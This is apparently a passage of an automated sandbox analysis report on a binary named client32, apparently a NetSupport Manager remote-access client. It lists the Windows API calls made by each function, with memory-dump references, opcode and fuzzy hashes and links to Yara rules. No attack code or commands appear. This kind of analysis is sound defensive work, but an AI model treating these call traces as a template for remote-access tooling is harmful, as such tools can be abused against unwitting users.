                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Library$Free$AddressErrorExitLastLoadMessageProcProcesswsprintf
                                                                                                                                                                • String ID: ..\ctl32\util.cpp$DllGetVersion$pdwMajorVer$pdwMinorVer
                                                                                                                                                                • API String ID: 2160193376-301070788
                                                                                                                                                                • Opcode ID: 2a8fc7a94a46caecedbed327bb066737295b455605f7211d1e2b0150595d0564
                                                                                                                                                                • Instruction ID: 6a29b7f029b91e0d2268b199c153ab63b6156163618a51e8f8cd3d343416273f
                                                                                                                                                                • Opcode Fuzzy Hash: 2a8fc7a94a46caecedbed327bb066737295b455605f7211d1e2b0150595d0564
                                                                                                                                                                • Instruction Fuzzy Hash: 50319375E0412A9BDB04DFA9E880BAEF7F4EF58719F10006EE919E7340DB71A9008B95
                                                                                                                                                                Function 110BB5A0 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 85COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • LoadCursorA.USER32(00000000,00007F02), ref: 110BB675
                                                                                                                                                                • SetCursor.USER32(00000000), ref: 110BB682
                                                                                                                                                                • SetCursor.USER32(00000000), ref: 110BB685
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Cursor$Load
                                                                                                                                                                • String ID: *StartPage$*WindowPos$IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$j CB::OnClose()
                                                                                                                                                                • API String ID: 1675784387-712237611
                                                                                                                                                                • Opcode ID: 1c6105e7932f0d056cf72b8fb5849ede38305ee900c17f807d9410f09db8cd81
                                                                                                                                                                • Instruction ID: 74c2bdc869b4bbdbbd78758767e6ba7e5d3ab86a6c16ffb7c9eb54b484d1c885
                                                                                                                                                                • Opcode Fuzzy Hash: 1c6105e7932f0d056cf72b8fb5849ede38305ee900c17f807d9410f09db8cd81
                                                                                                                                                                • Instruction Fuzzy Hash: 79219178B00A11AFD711EB29CC90F6AB3E5BF98708F104458E24647791CB75FD41CB99
                                                                                                                                                                Function 1112B270 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 78libraryloaderCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryA.KERNEL32(IPHLPAPI.DLL,?,?,?,?,1102E011,?,?,11194244,Trying to get mac addr for %u.%u.%u.%u,?,000000FF,?,?), ref: 1112B295
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SendARP), ref: 1112B2AE
                                                                                                                                                                • wsprintfA.USER32 ref: 1112B2FB
                                                                                                                                                                • wsprintfA.USER32 ref: 1112B313
                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,1102E011), ref: 1112B328
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Librarywsprintf$AddressFreeLoadProc
                                                                                                                                                                • String ID: %02x$IPHLPAPI.DLL$SendARP
                                                                                                                                                                • API String ID: 435568443-4085816232
                                                                                                                                                                • Opcode ID: 059c12f073bdf147a91715eca9bcb01dfedc32bce9f3742e1109da8ce792d870
                                                                                                                                                                • Instruction ID: 7d96227945af9bb0c0fa81f266df54215dce15e5fec16fb5673a6d202f8b9dc6
                                                                                                                                                                • Opcode Fuzzy Hash: 059c12f073bdf147a91715eca9bcb01dfedc32bce9f3742e1109da8ce792d870
                                                                                                                                                                • Instruction Fuzzy Hash: 87216D75E001299BCB14CFA6CD85AEEFBB8FF8D614F550118EC14A3300E635AE05CBA4
                                                                                                                                                                Function 11037230 Relevance: 13.6, APIs: 9, Instructions: 149COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • _free.LIBCMT ref: 11037267
                                                                                                                                                                  • Part of subcall function 11162BE5: HeapFree.KERNEL32(00000000,00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162BFB
                                                                                                                                                                  • Part of subcall function 11162BE5: GetLastError.KERNEL32(00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162C0D
                                                                                                                                                                • _free.LIBCMT ref: 1103728F
                                                                                                                                                                • _strncpy.LIBCMT ref: 110372BB
                                                                                                                                                                • _strncpy.LIBCMT ref: 110372F8
                                                                                                                                                                • _malloc.LIBCMT ref: 11037332
                                                                                                                                                                • _strncpy.LIBCMT ref: 11037343
                                                                                                                                                                • _strncpy.LIBCMT ref: 11037383
                                                                                                                                                                • _malloc.LIBCMT ref: 110373B6
                                                                                                                                                                • _strncpy.LIBCMT ref: 110373CC
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _strncpy$_free_malloc$ErrorFreeHeapLast
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1102513549-0
                                                                                                                                                                • Opcode ID: 49d6ee828f48e7441e9132c75d4151723e4ca8f50ebe71d103648970c0ae2386
                                                                                                                                                                • Instruction ID: 5b3f98012d02b14c7d353fffc6174d10c2b98c6782d71c8fdc241da8d4ec8af6
                                                                                                                                                                • Opcode Fuzzy Hash: 49d6ee828f48e7441e9132c75d4151723e4ca8f50ebe71d103648970c0ae2386
                                                                                                                                                                • Instruction Fuzzy Hash: 5A5152B5D04225AFDB20CF74CD84BCAFBECAF15348F004595998997240EBB5AA94CFE1
                                                                                                                                                                Function 11043710 Relevance: 13.6, APIs: 9, Instructions: 121COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • IsDlgButtonChecked.USER32(?,0000046F), ref: 1104375A
                                                                                                                                                                • IsDlgButtonChecked.USER32(?,00000470), ref: 1104376D
                                                                                                                                                                • DestroyCursor.USER32(?), ref: 110437F1
                                                                                                                                                                • DestroyCursor.USER32(?), ref: 110437FA
                                                                                                                                                                • DestroyCursor.USER32(00000000), ref: 1104380E
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CursorDestroy$ButtonChecked
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2664327029-0
                                                                                                                                                                • Opcode ID: 3c7e2840943497a05b97604098b0971d67cbf230661a95a93ee622ec4e9ca818
                                                                                                                                                                • Instruction ID: 913a87f5d1f4dae196699e1681375fdf05d89e945816625d83c4ba874613c616
                                                                                                                                                                • Opcode Fuzzy Hash: 3c7e2840943497a05b97604098b0971d67cbf230661a95a93ee622ec4e9ca818
                                                                                                                                                                • Instruction Fuzzy Hash: CA31B2B9F08B1297F620CB75CCC0F57B3E9AF84714F214578AAA58BA80EA71F841C750
                                                                                                                                                                Function 11065420 Relevance: 13.6, APIs: 9, Instructions: 115COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • OpenPrinterA.WINSPOOL.DRV(?,?,00000000,00000000), ref: 1106547F
                                                                                                                                                                • GetLastError.KERNEL32(?,?,00000000,00000000), ref: 11065488
                                                                                                                                                                • GetPrinterA.WINSPOOL.DRV(?,00000002,00000000,00000000,?,?,?,00000000,00000000), ref: 110654FC
                                                                                                                                                                • GetLastError.KERNEL32(?,00000002,00000000,00000000,?,?,?,00000000,00000000), ref: 11065505
                                                                                                                                                                • _malloc.LIBCMT ref: 11065519
                                                                                                                                                                  • Part of subcall function 11162B51: __FF_MSGBANNER.LIBCMT ref: 11162B6A
                                                                                                                                                                  • Part of subcall function 11162B51: __NMSG_WRITE.LIBCMT ref: 11162B71
                                                                                                                                                                  • Part of subcall function 11162B51: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162B96
                                                                                                                                                                • GetPrinterA.WINSPOOL.DRV(?,00000002,00000000,?,?,00000000,?), ref: 11065539
                                                                                                                                                                • _free.LIBCMT ref: 11065552
                                                                                                                                                                • GetLastError.KERNEL32(?,00000002,00000000,00000000,?,?,?,00000000,00000000), ref: 1106555C
                                                                                                                                                                • ClosePrinter.WINSPOOL.DRV(?), ref: 11065569
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorLastPrinter$AllocateCloseHeapOpenPrinter._free_malloc
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2468972630-0
                                                                                                                                                                • Opcode ID: e189d58571a4b5224f95438dc2af4bc1d130a46c47aba880a9296071b596f7c6
                                                                                                                                                                • Instruction ID: dd18d64e5e53a4005563cb4be3982e78098f84f3bbcd64b56140ec8fa16c62fe
                                                                                                                                                                • Opcode Fuzzy Hash: e189d58571a4b5224f95438dc2af4bc1d130a46c47aba880a9296071b596f7c6
                                                                                                                                                                • Instruction Fuzzy Hash: 73311AB5D0135A5BDB20DFB49C98ADFF7BD9B04348F0045E8E519D7101EA32AE84CB51
                                                                                                                                                                Function 110CD550 Relevance: 13.6, APIs: 9, Instructions: 89windowCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 1110F6C0: GetCurrentThreadId.KERNEL32 ref: 1110F6CE
                                                                                                                                                                  • Part of subcall function 1110F6C0: EnterCriticalSection.KERNEL32(00000000,76963760,00000000,111F0590,?,110CD565,00000000,76963760), ref: 1110F6D8
                                                                                                                                                                  • Part of subcall function 1110F6C0: LeaveCriticalSection.KERNEL32(00000000,7697A1D0,00000000,?,110CD565,00000000,76963760), ref: 1110F6F8
                                                                                                                                                                • EnterCriticalSection.KERNEL32(00000000,00000000,76963760,00000000,7697A1D0,1105DCBB,?,?,?,?,11026543,00000000,?,?,00000000), ref: 110CD56B
                                                                                                                                                                • SendMessageA.USER32(00000000,00000476,00000000,00000000), ref: 110CD598
                                                                                                                                                                • SendMessageA.USER32(00000000,00000475,00000000,?), ref: 110CD5AA
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,?,11026543,00000000,?,?,00000000), ref: 110CD5B4
                                                                                                                                                                • IsDialogMessageA.USER32(00000000,?,?,?,?,11026543,00000000,?,?,00000000), ref: 110CD5CB
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(00000000,?,?,?,11026543,00000000,?,?,00000000), ref: 110CD5E1
                                                                                                                                                                • DestroyWindow.USER32(00000000,?,?,?,11026543,00000000,?,?,00000000), ref: 110CD5F1
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,?,11026543,00000000,?,?,00000000), ref: 110CD5FB
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,?,11026543,00000000,?,?,00000000), ref: 110CD611
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CriticalSection$Leave$Message$EnterSend$CurrentDestroyDialogThreadWindow
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1497311044-0
                                                                                                                                                                • Opcode ID: f20bf26288957c11d1734c83877ac0841ecd78f8789a4f1d65426f3f39527bf2
                                                                                                                                                                • Instruction ID: ce85479676fbbacf97f04baa4819853d041e927657626279fb9dfb9fd4669857
                                                                                                                                                                • Opcode Fuzzy Hash: f20bf26288957c11d1734c83877ac0841ecd78f8789a4f1d65426f3f39527bf2
                                                                                                                                                                • Instruction Fuzzy Hash: 7821A176B15219ABE710DF78DC88B9EB7E8EB4C725F1041A5F918D7280E771E9008BE0
                                                                                                                                                                Function 1100D390 Relevance: 13.6, APIs: 9, Instructions: 75libraryloaderCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,11195920), ref: 1100D3A4
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,11195910), ref: 1100D3B8
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,11195900), ref: 1100D3CD
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,111958F0), ref: 1100D3E1
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,111958E4), ref: 1100D3F5
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,111958C4), ref: 1100D40A
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,111958A4), ref: 1100D41E
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,11195894), ref: 1100D432
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,11195884), ref: 1100D447
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressProc
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 190572456-0
                                                                                                                                                                • Opcode ID: 091c258913195d468f5e27a1e6f31e310fab824e6ee381838cf7674ab6c2accf
                                                                                                                                                                • Instruction ID: 496fda0e4c6754f74ae7accc981fa1b683a1531f66a76574b420f2493807621a
                                                                                                                                                                • Opcode Fuzzy Hash: 091c258913195d468f5e27a1e6f31e310fab824e6ee381838cf7674ab6c2accf
                                                                                                                                                                • Instruction Fuzzy Hash: BC318A719222349FE756CBE5CCD5B7AFFE9A748B19B00417AD42083248E7B46840CF90
                                                                                                                                                                Function 1109D560 Relevance: 13.6, APIs: 9, Instructions: 63fileCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • UnmapViewOfFile.KERNEL32(00000000,00000000,?,00000000,1109DD66,?,?,1109E8BF,00000064,00000006,?,11066C00,0000048C,00000001,00000000,NSMWClass), ref: 1109D56F
                                                                                                                                                                • CloseHandle.KERNEL32(?,00000000,?,00000000,1109DD66,?,?,1109E8BF,00000064,00000006,?,11066C00,0000048C,00000001,00000000,NSMWClass), ref: 1109D589
                                                                                                                                                                • CloseHandle.KERNEL32(?,00000000,?,00000000,1109DD66,?,?,1109E8BF,00000064,00000006,?,11066C00,0000048C,00000001,00000000,NSMWClass), ref: 1109D596
                                                                                                                                                                • CloseHandle.KERNEL32(?,00000000,?,00000000,1109DD66,?,?,1109E8BF,00000064,00000006,?,11066C00,0000048C,00000001,00000000,NSMWClass), ref: 1109D5A3
                                                                                                                                                                • SetEvent.KERNEL32(?,00000000,?,00000000,1109DD66,?,?,1109E8BF,00000064,00000006,?,11066C00,0000048C,00000001,00000000,NSMWClass), ref: 1109D5B5
                                                                                                                                                                • CloseHandle.KERNEL32(?,00000000,?,00000000,1109DD66,?,?,1109E8BF,00000064,00000006,?,11066C00,0000048C,00000001,00000000,NSMWClass), ref: 1109D5BF
                                                                                                                                                                • SetEvent.KERNEL32(?,00000000,?,00000000,1109DD66,?,?,1109E8BF,00000064,00000006,?,11066C00,0000048C,00000001,00000000,NSMWClass), ref: 1109D5D1
